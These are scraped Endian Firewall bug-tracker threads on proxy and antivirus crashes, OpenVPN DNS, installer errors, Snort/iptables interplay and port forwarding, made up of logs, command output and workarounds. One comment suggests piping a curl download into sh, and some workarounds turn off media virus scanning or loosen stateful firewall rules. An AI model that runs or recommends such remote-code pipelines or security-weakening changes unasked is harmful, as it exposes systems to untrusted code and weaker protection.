(0005383)
gmar_87   
2010-12-15 22:24   
I can confirm the this issue only occurs on release 2.4.1
(0005493)
lorenzo-endian   
2011-01-18 11:54   
Hi bordol,

can you provide please the version of you efw-clamav package?

You can get it with the command

rpm -q efw-clamav

Thanks in advance!

Lo
(0005501)
bortol   
2011-01-18 20:37   
Now I have reinstalled version 2.4.0 and the efw-clamav is efw-clamav-2.3.17-0.endian5
I don't kwow the version when of efw-clamav in 2.4.1 ... sorry

Bye

Bortol

p.s. in italiano

non conosco bene l'inglese dunque fatico a scrivere in quella lingua... Ho visto che ti chiami Lorenzo: non è che sei italiano?

Ho deciso, non essendo riuscito a fare funzionare senza blocchi la 2.4.1, di riinstallare la 2.4.0 con cui non ho problemi se non nello scaricamento di alcuni file pdf di grosse dimensioni.
(0005502)
lorenzo-endian   
2011-01-18 20:47   
Hey,

yes, I am italian :-P we try to use english on the bugtrack so that the information of a ticket are useful for all the people around the world :)

Today I tried to replicate the problem on a 2.4.1 but without success, but I think I have discovered something interesting and the fact that you are using the package efw-clamav-2.3.17-0.endian5 is a great help for me!

Thanks a lot

Lo

--- TRANSLATED ---

Ciao!

sisi, sono italiano :-P cerchiamo di tenere l'inglese sul bagtracker perchè cosi le informazioni servono a tutti quelli che nel mondo hanno problemi. Io oggi ho provato a replicare il problema con una 2.4.1 ma non ci sono riuscito.

Ad ogni modo credo di aver scoperto qualche cosa ed il fatto che stai usando il pacchetto efw-clamav-2.3.17-0.endian5 mi aiuta un sacco!

Grazie mille davvero

Lo
(0005510)
gmar_87   
2011-01-20 00:30   
My EFW 2.4.1 shows efw-clamav-2.4.4-0.endian8
(0005512)
claurita   
2011-01-20 08:25   
Hi everybody,
inserting myself in the thread because I have identical problem and made some tests I'd like to report.

Running 2.4.1, efw-clamav-2.4.4-0.endian8
The problem arises after a couple of hours since proxy reset, (under low traffic conditions). In my case, it's not related just to clam called from dansguardian. Using havp alone has about the same final effect, but squid reports a different error:
--------------
2011/01/18 23:57:00| helperOpenServers: Starting 20 'ncsa_auth' processes
2011/01/19 08:22:01| parseHttpRequest: Unsupported method '<D1><BC>Sp<D4><C1><D1><C6><AB><DD>^NY^R<89>^X<E3><E6><BA>^V^V=^Q^K<FC><D4><96>dx^S<93>bN^E<A8>KRi
<DF><99><8E>Wvh'
2011/01/19 08:22:01| clientReadRequest: FD 43 (192.168.18.54:1068) Invalid Request
--------------

I tried clamav updates from stellarcore.net (I've been using them since endian 2.0), actually clamav 0.95.5 and havp 0.91
Nothing seems changed, but I noticed that havp log claims an error in clamav:
-------------------
Jan 19 22:05:38 efw havp[32295]: Detected crashed ClamAV Library Scanner process
 (getanswer, pid: 32296, lasturl: http://www.google.it/search? [^])
Jan 19 22:05:38 efw havp[32295]: Scanner errors: ClamAV: Scanner crashed (lastur
l: http://www.google.it/search? [^])
Jan 19 22:14:25 efw havp[537]: Detected crashed ClamAV Library Scanner process (
getanswer, pid: 539, lasturl: http://suggestqueries.google.com/complete/search? [^])
Jan 19 22:14:25 efw havp[537]: Scanner errors: ClamAV: Scanner crashed (lasturl:
 http://suggestqueries.google.com/complete/search? [^])
---------------

If I could help with other tests, ask me.
Claudio
(0005651)
lorenzo-endian   
2011-02-09 22:19   
Hi everybody,

I have tested a lot havp and clamav and they don't freeze the system on my side.

Can I kindly ask to you which version of HAVP are your systems running?

You can get it using

rpm -q efw-havp

Thanks to all in advance!

Lo
(0005652)
lorenzo-endian   
2011-02-09 22:28   
ps: On my system:

root@efw-lo-ce-2:~ # rpm -q efw-clamav
efw-clamav-2.4.4-0.endian8
root@efw-lo-ce-2:~ # rpm -q efw-havp
efw-havp-2.3.19-0.endian3
root@efw-lo-ce-2:~ # rpm -q squid
squid-2.6.STABLE22-6.endian10
root@efw-lo-ce-2:~ #
(0005653)
gmar_87   
2011-02-10 06:13   
My system:
root@PROXY1:~ # rpm -q efw-clamav
efw-clamav-2.4.4-0.endian8
root@PROXY1:~ # rpm -q efw-havp
efw-havp-2.3.19-0.endian3
root@PROXY1:~ # rpm -q squid
squid-2.6.STABLE22-6.endian10
root@PROXY1:~ #
(0005655)
claurita   
2011-02-10 08:25   
This is my "official" efw machine:
root@efw:~ # rpm -q efw-clamav
efw-clamav-2.4.4-0.endian8
root@efw:~ # rpm -q efw-havp
efw-havp-2.3.19-0.endian3
root@efw:~ # rpm -q squid
squid-2.6.STABLE22-6.endian10

Don't know if this could help:
I'm also actually testing efw on a pc without hd (I'm using a 2GB SD, tmpfs for /tmp and /var, 2 GB ram, NO swap). It's a fresh 2.4.1 install with the same patches applied as my "official" one, and works very well. Focusing, of course, on ram usage, I noticed that sometimes it starts rising and reaches 98% in few hours (normally is about 50%, low load, many days of working). At that point, havp crashes in a way much similar to the one focused in this thread. Haven't yet found the event which triggers this behaviour, but I suspect it could be exactly the same problem we're investigating here.
Claudio
(0005799)
ardit-endian   
2011-03-03 10:01   
(edited on: 2011-03-03 10:54)
Hi,

the problem is related to dansguardian, for some reason "the guy" goes down :)

http://pastie.org/1627966 [^]

The problem with dansguardian now is that it have no debug options [at least for this issue], if you want dansguardian in debug mode we need to compile the "debug version" of dansguardian:

http://contentfilter.futuragts.com/wiki/doku.php?id=using_a_debug_version [^]

As the wiki says, this version is used for
"Unexplained frequent crashes when not even a stack backtrace identifies a resolution. "

I think this is the case.

In past we have several reports of the same problem and unfortunately dansguardian doesn't "say" much om the logs.

Regards,
Ardit.

(0005879)
diwoda   
2011-03-08 12:15   
Something new about this? I had a similar problem today, http proxy just stopped working, believing that it is the same issue. Flushing the Cache made it work again...Logs look quite the same as above...

greets
Johann
(0005889)
lorenzo-endian   
2011-03-08 15:43   
Hello diwoda,

we are working on it! I will keep you updated about the progress :)

Thanks for the patience

Lo
(0007087)
gvecchi   
2011-07-26 07:01   
(edited on: 2011-07-28 09:29)
Hi all!
I think I have the problem me too.

root@PROXY:~ # rpm -q efw-clamav
efw-clamav-2.4.4-0.endian8
root@PROXY:~ # rpm -q efw-havp
efw-havp-2.3.19-0.endian3
root@PROXY:~ # rpm -q squid
squid-2.6.STABLE22-6.endian10
root@PROXY:~ # rpm -q efw-dansguardian
efw-dansguardian-2.4.1-2.endian15

after weekly/dayly automatic backup, dansguardian fails to start:


root@PROXY:~ # /etc/init.d/dansguardian restart
Stopping dansguardian: [FAILED]
Starting dansguardian: [FAILED]

Any workaround? Any news about solution?

Setting squid to allow traffic when dansguardian goes down may be a right workaround, isn't it?

Thanks!

(0008352)
victorhugops   
2012-12-10 15:49   
Hello,

here, we have the same problem (with the last endian version) !!! :-(
(0008368)
rbianchi   
2013-02-08 15:15   
We have the same problem with Endian Community ed. 2.5.1
Trying disable HAVP.
(0008415)
jejethx   
2013-04-06 20:27   
Hello,

Do you find issue to this probleme?
I'am increase MAXSERVERS & SERVERNUMBER in /var/efw/havp/settings :
MAXSERVERS=500
SERVERNUMBER=200
Set 1Mb of Squid cache but it not resolv.

Regards
(0008418)
riaanjvr   
2013-04-16 19:29   
(edited on: 2013-04-16 19:38)
Hallo
This happens in the commercial Endian as well. I have the latest version 2.5.1 Endian appliance. In the Web IF one can see HAVP is not running. It broke after a while from setting it up, and I changed the P.I.C.S score from 50 to 100 in the content filter.

Flushing the cache, rebooting, en/disabling the proxy doesnt help
Forcing an update of Dansguardian rules, doesnt help






View Issue Details
4540 [Endian Firewall] Endian Firewall major always 2013-04-16 17:25 2013-04-16 17:25
fernando.guse  
 
high  
new  
open  
none    
none  
   
DUAL LINK WAN
Hello

I have the following scenario for Internet access:

WAN0 - eth1: RED
WAN1 - eth4: RED

If I set any of the links as the second link shows MAIN FAILURE with the following log.

/var/log/messages
Apr 16 13:11:52 LOFW001GFT sudo: nobody : TTY=unknown ; PWD=/home/httpd/cgi-bin ; USER=root ; COMMAND=/etc/rc.d/uplinks start uplink1 --with-hooks
Apr 16 13:11:52 LOFW001GFT uplink[uplink1]: Starting Uplink 'uplink1'
Apr 16 13:11:53 LOFW001GFT kernel: [ 261.936098] e1000e 0000:01:00.1: irq 30 for MSI/MSI-X
Apr 16 13:11:53 LOFW001GFT kernel: [ 261.986175] e1000e 0000:01:00.1: irq 30 for MSI/MSI-X
Apr 16 13:11:53 LOFW001GFT kernel: [ 261.986492] ADDRCONF(NETDEV_UP): eth4: link is not ready
Apr 16 13:11:53 LOFW001GFT kernel: [ 262.606054] e1000e 0000:01:00.1: irq 30 for MSI/MSI-X
Apr 16 13:11:53 LOFW001GFT kernel: [ 262.656051] e1000e 0000:01:00.1: irq 30 for MSI/MSI-X
Apr 16 13:11:53 LOFW001GFT kernel: [ 262.656379] ADDRCONF(NETDEV_UP): eth4: link is not ready
Apr 16 13:11:53 LOFW001GFT uplink[uplink1]: Notify uplinks daemon about status change of uplink 'uplink1'. Status id FAILED
Apr 16 13:11:53 LOFW001GFT uplink[uplink1]: Uplink 'uplink1' status: 'OFFLINE'
Apr 16 13:11:53 LOFW001GFT uplink[uplink1]: Could not set up routing

As a way to circumvent the problem perform the following activities.

1) Link setup MAIN
2) mv /var/efw/uplinks/uplink1/failure /var/efw/uplinks/uplink1/active
3) ifconfig eth4 200.146.46.254 netmask 255.255.255.248

This way I can climb the two links but it is not the most pleasant thing to do.

Would like to help me solve this problem?

I await a return.

Sincerely.

Fernando Guse
There are no notes attached to this issue.





View Issue Details
4295 [Endian Firewall] Other Services minor always 2012-03-08 15:52 2013-04-12 16:54
shairozan  
christian-endian  
normal  
feedback 2.5  
reopened  
none    
none  
   
NTOP Segmentation Fault
Hello everyone,

I have noticed an issue with the 2.5.1 EFW Ntop that I wanted to report. After an out-of-the box installation, I tried to activate the NTOP monitoring system. It would run for a while (3-7 minutes) and then stop.

/etc/init.d/ntop status would return that ntop is dead, but a PID still exists.

I couldn't find any useful logs for ntop outside of monit.log, but it only ever contained information about the system starting and stopping. As such, I launched ntop using the configurations in /etc/ntop/ntop.conf (But I specified to use http 3001 not https 3001).

It seemed to work fine for a while, which blew my mind, but eventually it stopped with the following output:


Thu Mar 8 10:33:02 2012 THREADMGMT[t2967894960]: SIH: Idle host scan thread running [p9813]
Thu Mar 8 10:33:02 2012 THREADMGMT[t2976283568]: SFP: Fingerprint scan thread running [p9813]
Thu Mar 8 10:33:02 2012 THREADMGMT[t2917264304]: NPS(WAN): pcapDispatch thread starting [p9813]
Thu Mar 8 10:33:02 2012 THREADMGMT[t2917264304]: NPS(WAN): pcapDispatch thread running [p9813]
Thu Mar 8 10:33:02 2012 THREADMGMT[t2908875696]: NPS(2): Started thread for network packet sniffing [br0]
Thu Mar 8 10:33:02 2012 THREADMGMT[t2900487088]: NPS(3): Started thread for network packet sniffing [eth0]
Thu Mar 8 10:33:02 2012 THREADMGMT[t2908875696]: NPS(br0): pcapDispatch thread starting [p9813]
Thu Mar 8 10:33:02 2012 THREADMGMT[t2908875696]: NPS(br0): pcapDispatch thread running [p9813]
Thu Mar 8 10:33:02 2012 THREADMGMT[t2900487088]: NPS(eth0): pcapDispatch thread starting [p9813]
Thu Mar 8 10:33:02 2012 THREADMGMT[t2900487088]: NPS(eth0): pcapDispatch thread running [p9813]
./start_ntop.sh: line 2: 9813 Segmentation fault ntop --user ntop --db-file-path /var/ntop --interface eth1,br0,eth0 --trace-level 3 --https-server 0 --http-server 3001 --disable-schedyield --no-fc

It will start every time, but eventually fails with the segmentation fault
Attached is the shell script I was using to launch ntop
start_ntop.sh (163) 2012-03-08 15:52
https://bugs.endian.com/file_download.php?file_id=919&type=bug
Notes
(0007785)
shairozan   
2012-04-02 12:12   
Excuse me, but how is this resolved? You haven't given me any information as to if it was already fixed, a patch or anything.

Please advise.
(0007807)
christian-endian   
2012-04-04 20:35   
This has been resolved - not yet released, though (thus the bug has been resolved, not closed)!
An update should be out soon.
(0008417)
soportenalucho   
2013-04-12 16:54   
I have several firewall 2.5 and 2.5.1 version with the same problem ... is there any solution?





View Issue Details
4539 [Endian Firewall] Uncategorized major always 2013-04-11 10:28 2013-04-11 10:34
mvldebian  
 
normal  
new 2.5  
open  
none    
none  
   
Sarg generates no access denied
By enabling authenticated proxy the SARG can not generate the access denied page.
Enabling HTTP reports

*** Attached print behavior using authenticated proxy
When the proxy is transparent SARG generates the page in question. In other reports can also be viewed DENIED beside the URL accessed.
Sem título.png (5,796) 2013-04-11 10:28
https://bugs.endian.com/file_download.php?file_id=1046&type=bug
transparent_proxy.png (52,981) 2013-04-11 10:34
https://bugs.endian.com/file_download.php?file_id=1047&type=bug
There are no notes attached to this issue.





View Issue Details
4532 [Endian Firewall] OpenVPN Client and Server major always 2013-02-19 05:31 2013-04-07 16:40
d072330  
 
normal  
new 2.5  
open  
none    
none  
   
2.5.1 DNS issue openvpn
I have installed 2.5.1 several times now on different hardware and version 2.5.1 will not push DNS serves to clients. Clients can ping and get to servers by IP but not FQDN. If I install 2.5.0 it pushes the DNS servers every time. It looks to us that the OpenVPN version is the same in both versions so why does one version push DNS and the other does not?

Any suggestions before I rebuild to 2.5.0?
Install 2.5.1 with same OpenVPN settings and firewall rules as 2.5.0.
Notes
(0008384)
d072330   
2013-02-20 18:33   
Work around:

Add these lines for each DNS server you want to push to

/etc/openvpn/openvpn.conf.tmpl

push "dhcp-option DNS 10.X.X.X"
push "dhcp-option DNS 10.X.X.X"

Then when you restart the OpenVPN server the changes stick in /etc/openvpn/openvpn.conf
(0008405)
richardsk   
2013-03-27 17:09   
(edited on: 2013-03-27 17:14)
Where are these client authenticating from, locally or thru LDAP?
I've found that the username characters case is a issue for VPN and also using # character as the first character in your password.

Example:

Username- Doej vs doej - Doej gets no DNS options while doej gets a different IP address and gets DNS options. Theoretically they are the same user but Endian doesn't see it that way, just the beauty of unix at work.

Password- #Joedoe1 - Pound/Number sign causes Endian to ignore password submitted. Maybe because pound is the character to notify system to ignore or treat following as a comment.






View Issue Details
4231 [Endian Firewall] Installation tweak always 2011-12-29 20:59 2013-04-07 04:08
piratpl  
 
normal  
feedback 2.5  
open  
none    
none  
   
"Your Harddisk is to small" error message during install of 2.5 version
When installing 2.5 on VMware with a disk 15GB or less the installation fails with an error message "Your harddisk is to small" sh: -c line 0: unexpected EOF while looking for matching '"
It could very well be that you need a bigger hd to install 2.5 however, I was able to install 2.41 on a 10GB drive.
I didn't find the minimum hd requirement during my install as i'm limited to 15 GB at the moment.
Notes
(0007588)
aender   
2011-12-30 06:37   
With Virtualbox and a 8GB disk the installation is not problem. Could it be that this is only a problem with vmware?
(0007611)
christian-endian   
2012-01-10 08:56   
Tried installing on a VMware virtual machine with 8GB disk space and had no problems at all. How did you configure your virtual machine? What kind of disk controller did you use?
(0007623)
abhijeet1984   
2012-01-12 10:31   
Hiiii..

I am also suffring frm this problem.

I am installing endin 2.5 on IBM x3550 server but the installation fails with an error message "Your harddisk is to small" sh: -c line 0: unexpected EOF while looking for matching '"
(0007632)
christian-endian   
2012-01-17 08:50   
Can you switch to the second console after you see this message? Is there anything else you see?
You can switch with Alt+F2

Thank you
(0007695)
piratpl   
2012-02-05 17:52   
I was not able to reportoduce the issue after I rebooted the vSphare server.
(0007696)
Byzt   
2012-02-05 19:58   
Hi;

I'm having the same problem. But I installed 2.4.1
(0007716)
Beorn   
2012-02-14 08:40   
(edited on: 2012-02-14 08:46)
Error at the vmware esxi 5.0 console:
"Scanning target drives
Check fot hardware raid controller: NOT FOUND"

Edit: Works with SCSI Controller LSI Logic Parallel
NOT with LSI Logic SAS and VMWare Paravirtual

(0007717)
mudgie   
2012-02-15 01:12   
This happened the first time I did a VMware ESXi install. I originally let it default to "Red Hat Enterprise Linux 6 (32-bit)" but it defaulted to the VMware Paravirtual controller, which indicated insufficient space. Choosing "custom" and "Other Linux (32-bit)" defaulted the controller to LSI Logic Parallel, which worked fine.
(0008416)
soypin8   
2013-04-07 04:08   
Use Red Hat Enterprise 6, its works.





View Issue Details
2464 [Endian Firewall] Firewall (iptables) major always 2009-12-01 03:53 2013-04-03 10:09
vikash  
peter-endian  
normal  
confirmed 2.3  
open  
none    
none  
  future  
Snort blocks smb and netbios over VPN despite FW rule
Ive got EFW 2.3 with openvpn and client is a roadwarrior. VPN works fine ie. I can ping and SSH to machines on the GREEN zone to/from the openvpn client.

PING OK : VPN client <----> GREEN zone
SSH OK : VPN client <----> GREEN zone
smb/netbios BLOCKED : VPN client <----> GREEN zone

After almost a week I figured out that snort(IPS) will block smb and netbios over the VPN despite the VPN firewall rule to allow all access, also same result if VPN firewall is disabled.

If I switch off IPS then file and print sharing WORKS. There is nothing in the logs about these packets being blocked otherwise I would have found out much earlier.

Please advise a fix to this.
Notes
(0003518)
vikash   
2009-12-06 04:23   
If I disable the rule "ET SCAN Behavioral Unusual Port 445 traffic, Potential Scan or Infection" in the IPS rule editor then file and print sharing works fine.
(0003519)
mrkroket   
2009-12-07 15:01   
Firewall rules in EFW 2.3 has two types of allowing traffic to pass: "ALLOW" (a green arrow) and "ALLOW with IPS" (green arrow with a magnifying glass). The former doesn't go thru IPS.

 Maybe you can just use "ALLOW" instead "ALLOW with IPS" on you FW VPN rules for port 445, this way your smb VPN traffic won't be IPS inspected and you don't need to disable that IPS rule.
(0003520)
vikash   
2009-12-07 15:26   
Yes i understand how it is suppose to work. However even if I turn off the VPN firewall snort is still filtering the VPN traffic. I have also tried to enable the VPN firewall and create a rule to "ALLOW" all traffic but still I have the same result.

Currently VPN firewall is enabled with the following rule:
Source : GREEN + OPENVPN
Destination : GREEN + OPENVPN
Service : <ANY>
Policy : ALLOW

But still I need to disable snort rules.
(0003523)
peter-endian   
2009-12-07 18:05   
can you post the output of:

iptables -vnL VPNFW


it should use ACCEPT targets instead of ALLOW, in order not to pass through snort.
(0003525)
vikash   
2009-12-08 11:37   
VPN firewall enabled with the above rule, output as below:
# iptables -vnL VPNFW
Chain VPNFW (7 references)
 pkts bytes target prot opt in out source destination
39786 5732K ACCEPT all -- br0 br0 0.0.0.0/0 0.0.0.0/0

VPN firewall disabled, output as below:
# iptables -vnL VPNFW
Chain VPNFW (7 references)
 pkts bytes target prot opt in out source destination
    0 0 ALLOW all -- * * 0.0.0.0/0 0.0.0.0/0

In both cases snort is filtering my VPN traffic.
(0003533)
peter-endian   
2009-12-09 15:10   
ok, when vpn firewall is disabled, it uses ALLOW, which is wrong.. i fixed that

but, when the vpn firewall is enabled and it uses ACCEPT, it should not pass through snort. can you confirm that?

the ACCEPT rule for sure does not pass through snort. if it still passes, there must be another rule which does.
(0003537)
vikash   
2009-12-10 06:57   
OK, I will update you on that in asap.

FYI, both of my outgoing and inter-zone traffic firewall is switched off and I found that the chains are using ALLOW as below:

Chain OUTGOINGFW (1 references)
 pkts bytes target prot opt in out source destination
    0 0 ALLOW all -- br1 ppp0 0.0.0.0/0 0.0.0.0/0
    0 0 ALLOW all -- br2 ppp0 0.0.0.0/0 0.0.0.0/0
 496K 37M ALLOW all -- br0 ppp0 0.0.0.0/0 0.0.0.0/0

Chain ZONEFW (1 references)
 pkts bytes target prot opt in out source destination
    0 0 ALLOW all -- br0 br0 0.0.0.0/0 0.0.0.0/0
    0 0 ALLOW all -- br0 br2 0.0.0.0/0 0.0.0.0/0
    0 0 ALLOW all -- br0 br1 0.0.0.0/0 0.0.0.0/0
    0 0 ALLOW all -- br2 br2 0.0.0.0/0 0.0.0.0/0
    0 0 ALLOW all -- br1 br1 0.0.0.0/0 0.0.0.0/0
(0003540)
luca-endian   
2009-12-10 12:04   
Actually disabled means a default inter-zone firewall configuration.
(0003542)
vikash   
2009-12-10 13:42   
peter: I have tested again and even when the rule is ACCEPT snort will still filter the traffic.

# iptables -vnL VPNFW
Chain VPNFW (7 references)
 pkts bytes target prot opt in out source destination
 2199 295K ACCEPT all -- * * 0.0.0.0/0 0.0.0.0/0

Please check what else is wrong.
(0003563)
vikash   
2009-12-16 00:09   
Hi, Please let me know if you need any further information for diagnosis.
(0003589)
peter-endian   
2009-12-18 18:44   
if the rule is ALLOW and snort is disabled, that's fine. the ALLOW chain does not pass to snort if snort is disabled. if you enable it it will pass it.

ACCEPT definitively does not pass to snort.
so there must be another ALLOW rule which passes

wow.. well it is indeed:

  26M 23G ALLOW all -- * * 0.0.0.0/0 0.0.0.0/0 state RELATED,ESTABLISHED

uhm.. did not think about this. not so easy to solve this however.
i must rethink it :/
(0003598)
peter-endian   
2009-12-19 01:21   
2 possible solutions (however no chance to solve quickly)
probably (hopefully) there's a 3rd (the easier one)

solution 1:
- mark connections whose syn packet goes to the QUEUE
- ALLOW only related/established packets which are marked
- ACCEPT not marked packets
X problem: we exhaused the mark bandwith. using 1 bit of another bitmask is
  currently bad option.. maybe after kernel-upgrade
x big mess with all those markings

solution 2:
- move the accept all established/related rule to the LOGDROP chains in
  order that every firewall subsystem accepts its own established/related
  connections
- always create also an established/related rules before each ALLOW rule
X each established packet need to pass a lot of unnecessary rules
X much more rules than before

would be nice if connection tracking table would know if packets of the connections passed QUEUE.
(0008414)
peter-endian   
2013-04-03 10:09   
well. the assumption that CONNMARK is working only in the mangle table was simply wrong.

solution 3:
- before passing to the QUEUE target, CONNMARK
- established/related rule should only ALLOW if it is CONNMARKed otherwise ACCEPT





View Issue Details
4538 [Endian Firewall] GUI minor always 2013-04-03 07:26 2013-04-03 07:28
mgr9500  
 
high  
new  
open  
none    
none  
   
calaendar problem, duplice day
in month 3 day 16 duplicate at year 2013 and in year 2012 day 17 duplicate
place after remove this bug send for me.
mgr9500@yahoo.com
Notes
(0008413)
mgr9500   
2013-04-03 07:28   
Sorry my English is not good, but I LIKE ENDIAN :-*





View Issue Details
4497 [Endian Firewall] OpenVPN Client and Server minor always 2012-11-14 08:34 2013-03-22 16:26
ipanema211  
 
normal  
new 2.5  
open  
none    
none  
   
Openvpn GUI settings not saved to settings file - settings file resets when saving via GUI
Hello,

I upgraded our firewall from 2.4.1 to 2.5. I restored a backup to do this, mainly because we have around 150 openvpn users I didn't want to recreate.

When I try to save global options in the GUI, nothing is saved to the /etc/openvpn.conf file. When I edit the conf file and restart the Openvpn service through SSH, everything is OK and the options are pushed correctly. The options aren't displayed in the GUI though.

When I then try to change a global option in the GUI, or even just click the save & restart button in the GUI, the openvpn.conf file gets reset to default, and my clients receive the DNS servers below instead of their correct ones (at that moment no DNS servers are defined in the conf file because of the reset)

DNS Servers . . . . . . . . . . . : fec0:0:0:ffff::1%1
                                    fec0:0:0:ffff::2%1
                                    fec0:0:0:ffff::3%1


Thanks!
Notes
(0008362)
ipanema211   
2013-01-07 17:33   
THIS BEHAVIOUR IS REPRODUCEABLE!!!

Dear staff, this is a real bug. Please take a look at it...

I confirm this happens to all systems when restoring a 2.4 backup!
(0008395)
richardskamar   
2013-03-22 16:26   
I've had a similar problem however it is when i edit var/efw/openvpn/settings file and make changes for my ldap settings, the parameters within the file specifically the following lines

LDAP_BIND_DN=cn=EndianLDAP,ou=Service Accounts,dc=mydomain,dc=com

LDAP_USER_BASEDN=ou=All Users,dc=mydomain,dc=com

after administering VPN via SSH and restart the openvpn service through SSH, everything is OK however when I then try to change a global option in the GUI, or even just click the Save & Restart button in the web GUI (VPN > Advanced), the settings file (var\efw\openvpn\settings gets modified as shown below from the original modification above, and my clients receive a auth error trying to VPN in. Note the added quotations appended.

LDAP_BIND_DN='cn=EndianLDAP,ou=Service Accounts,dc=mydomain,dc=com'

LDAP_USER_BASEDN='ou=All Users,dc=mydomain,dc=com'

These qoutes now appear and seem to causing a problem, thus to remedy have to make all global changes first then edit settings file and restart openvpn service via ssh interface.





View Issue Details
3432 [Endian Firewall] Proxy HTTP major always 2011-01-14 16:06 2013-03-11 08:41
ardit-endian  
peter-endian  
normal  
feedback 2.4.1  
open  
none    
none  
   
HAVP => no youtube videos from iphone & ipad
When HAVP is enabled we are unable to see youtube videos with iphone or ipad.
when is disabled the problem disappears.

The issue is reproducible and the zone is indifferent (green/orange or blue).

I noticed testing this that the cause is havp but no error message in the log.

System tested was full up-to-date.
Notes
(0005478)
baldy   
2011-01-15 13:26   
(edited on: 2011-01-15 13:31)
Hi Ardit,

the option "SKIPMIME image/* video/* audio/*" should fix the problem.

Option should be added to /etc/havp/havp.conf
Not sure whether the file will be overwritten when the process restarts.

http://www.ipcops.com/phpbb3/viewtopic.php?f=7&t=14274 [^]

regards,

Baldy

(0005479)
ardit-endian   
2011-01-17 08:31   
Hi Baldy,

Actually, there is an Mime Type option in Access Policy rules but it is applicable only with "deny access"

We should try putting SKIPMIME image/* video/* audio/* to havp.conf.tmpl (this modification is permanent) and see if this solve the problem.

nice catch,

I hope that there will be a fix included in the next update.

Regards,
Ardit.
(0005480)
ardit-endian   
2011-01-17 09:55   
(edited on: 2011-01-17 09:59)
NOTE:

Option not supported in havp 0.90 (currently installed in 2.4 enterprise), option available only with 0.92 and up*

Please note:

update also;
dansguardian,
squid,
clamav

(0005877)
diwoda   
2011-03-08 11:57   
Sorry, but this bug is NOT minor at all !

Especially not in Hotspot Inviroments but also in everydays life! Just think about the immense number of iphone and ipad users!

Kindly request a FAST solution! (bypassing the proxy is no option because it is not possible to enter each MAC or IP Address manually...)
(0006342)
timboau   
2011-05-16 04:59   
Hi,
Has any progress been made with this.

I'm looking at deploying Endian as a firewall/proxy and everything was working perfectly until I deployed it and users started complaining about videos not streaming. It appears they are Flash videos that are not working.
Unfortunately this will be a deal breaker for me and I will have to look elsewhere. I'm happy to exclude the complete site from the proxy if necessary however that didnt seem to make any difference.

Could it be anything to do with RTMP Protocol?
(0006515)
baldy   
2011-05-26 23:00   
Hi timboau,

Can you test this package and post back the results ?

From a ssh session: curl bugfixes.endian.com/havp-clam/install | sh

I have been testing this package for different reasons, but should fix your problem in combination with the /SKIPMIME option above.

Regards,

Klaas-Jan
(0006558)
davezeking   
2011-06-02 10:18   
Hi baldy,

I've been having the same issue with Youtube and HTML5 videos on the iPad, I tried your fixes (the update and SKIPMIME directive), this still didn't fix the issue.

After hours of messing around I've worked out that the RANGE command needs to be supported by the proxy in order to use pseudo HTTP Streaming on iOS.

If you add the following line to /etc/havp/havp.conf.tmpl:

RANGE true

And then save your changes via the web interface so the template is written into the live config file you should find that both the YouTube app and HTML5 videos in Safari now work.

In the end I commented out the SKIPMIME directive as this didn't seem to help and also seems less secure.

Regards,

Dave.
(0007767)
luca-endian   
2012-03-27 12:08   
rpm -q havp
havp-0.92a-2.endian15

root@stan:/etc/havp # cat havp.conf | grep SK
SKIPMIME image/* video/* audio/*

Doesn't fix the problem..
(0007768)
luca-endian   
2012-03-27 13:11   
rpm -q havp
havp-0.92a-2.endian15

root@stan:/etc/havp # cat havp.conf | grep RANGE
RANGE true

youtube and appstore on iphone works
(0007906)
fqureshi   
2012-06-07 22:10   
I was facing the same issue. First I passsed the argument of "RANGE true" it didn't work. Then I checked the version of havp which is havp-0.92a-2.endian15.

Then I added SKIPMIME image/* video/* audio/*
everything is working as desired. Thus I am passing two arguments in havp.config.tmpl file

RANGE true
SKIPMIME image/* video/* audio/*
(0008007)
Lyve   
2012-08-11 16:07   
Thanks @fqureshi this fixed the problem for me, too.
(0008008)
ardit-endian   
2012-08-13 08:13   
@everyone,

yes the SKIPMIME will fix the issue but will also not scann any image, picture, audio for viruses.

Don't use this setting in critical environments where you rely on the antivirus for protecting your data.
(0008391)
herbert-endian   
2013-03-11 08:41   
Hi Guys,

I have a customer with the same issue on all of his Machines.
I gave him the workaroung with the information from Ardit, that he should pay attention.
When would this Bug be fixed?

Please let me know.
Cheers.

Herbert





View Issue Details
4535 [Endian Firewall] VPN - IPSec major always 2013-03-01 02:15 2013-03-01 02:15
EduSuzuki Endian 2.5 Community  
 
normal  
new 2.5  
open  
none    
none  
   
Endian 2.5 Community does not accept special characters in the PSK
I'm trying to use a PSK for the establishment of an IPsec tunnel. This PSK contains some special characters, such as * and &.

When I try to set this PSK up at an Endian 2.5 Community firewall, it complains about these characters with an error message like this:

"Invalid characters found in the pre-shared key."

I've searched the issues database and found the issue 0000613 where the situation is the same. The responsible for the ticket says it's solved but I'm facing the same issue on version 2.5.

Please help me out.
Set up a new IPsec connection.
Use PSK as the authentication method for the 1st phase of the IPsec tunnel establishment.
Use a pre-shared key that has special characters. E.g.: PsK_913*&
There are no notes attached to this issue.





View Issue Details
1151 [Endian Firewall] Firewall (iptables) crash always 2008-07-23 10:10 2013-02-22 13:58
jasonwalls  
peter-endian  
normal  
confirmed 2.5  
open  
none    
none  
  future  
portforwarding: unable to access GREEN from GREEN via RED portforward rule
as per summary, a device on the GREEN network is unable to access another device on the GREEN network, by using the RED interface and portforwarding.

we configure mobile devices to access resources on the GREEN network, by using the RED device and port forwarding. they can operate onsite and offsite (without vpn) this way.
Notes
(0001512)
peter-endian   
2008-08-08 11:11   
packets will return directly from the target to the source, whenever they are in the same subnet

portfw rule should somehow automatically create a
non-stateful GREEN -> GREEN allow rule for that specific port/target and target-subnet as source.
little problem is that PORTFWACCESS stateful.

maybe PORTFWACCESS should become non-statefule at all (?)
(0001757)
peter-endian   
2008-10-27 19:49   
Workaround is to configure hosts with their public domain in Network > Hosts and make them point to internal ip addresses, which makes the portforward work for machines in green

another workaround:
edit /etc/rc.d/rc.firewall
search for PORTFWACCESS
remove -m state --state NEW

resolution of this issue is not scheduled right now, please use the workarounds instead
(0001778)
yokomaka   
2008-11-06 13:23   
Thanks for pointing out the workarounds.

1) Works fine for us, however it does not really solve our problem. We have one external IP and forward multiple ports to different internal machines. I don't know how to do this with the given solution as it would only allow me to point a hostname to one internal IP, independent of the port.

2) Does not seem to work for me with 2.2RC3. I changed the line
"iptables -A FORWARD -m state --state NEW -j PORTFWACCESS"
to "iptables -A FORWARD -j PORTFWACCESS"
and rebooted the firewall.
Is there anything else that I missed to get this working?
(0003755)
peter-endian   
2010-02-09 14:23   
